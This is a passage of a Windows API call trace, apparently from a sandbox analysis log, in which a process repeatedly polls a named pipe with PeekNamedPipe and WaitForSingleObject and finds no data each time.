lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0078.478] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0078.512] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0078.512] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0078.540] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0078.540] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0078.571] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0078.571] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0078.614] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0078.614] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0078.634] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0078.634] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0078.665] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0078.665] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0078.696] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0078.696] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0078.746] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0078.747] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0080.420] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0080.421] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0080.966] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0080.967] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0081.024] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0081.025] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0081.066] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0081.066] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0081.090] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0081.090] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0081.131] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0081.131] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0082.459] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0082.460] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0082.770] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0082.774] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0082.941] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0082.941] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.011] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.011] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.047] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.092] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.178] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.178] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.325] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.325] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.345] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.345] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.376] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.376] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.407] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.407] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.439] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.439] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.470] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.470] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.501] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.501] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.532] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.532] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.565] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.565] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.609] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.609] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.626] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.626] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.657] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.657] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.688] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.688] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.719] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.719] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.750] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.750] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.788] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.788] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.813] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.813] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.844] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.844] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.875] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.875] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.906] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.906] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.939] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.939] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0083.969] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.969] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.000] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.000] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.047] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.047] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.081] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.081] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.109] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.109] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.140] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.141] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.172] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.172] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.203] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.203] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.234] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.234] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.265] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.265] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.296] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.297] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.328] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.328] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.359] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.360] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.390] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.390] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.421] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.421] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.452] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.453] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.484] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.484] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.515] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.515] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.546] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.546] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.578] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.578] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.608] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.609] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.640] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.640] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.671] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.671] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0084.702] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.702] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0086.355] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0086.355] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0086.624] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0086.624] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0087.302] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0087.302] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0087.329] PeekNamedPipe (in: hNamedPipe=0xb0, 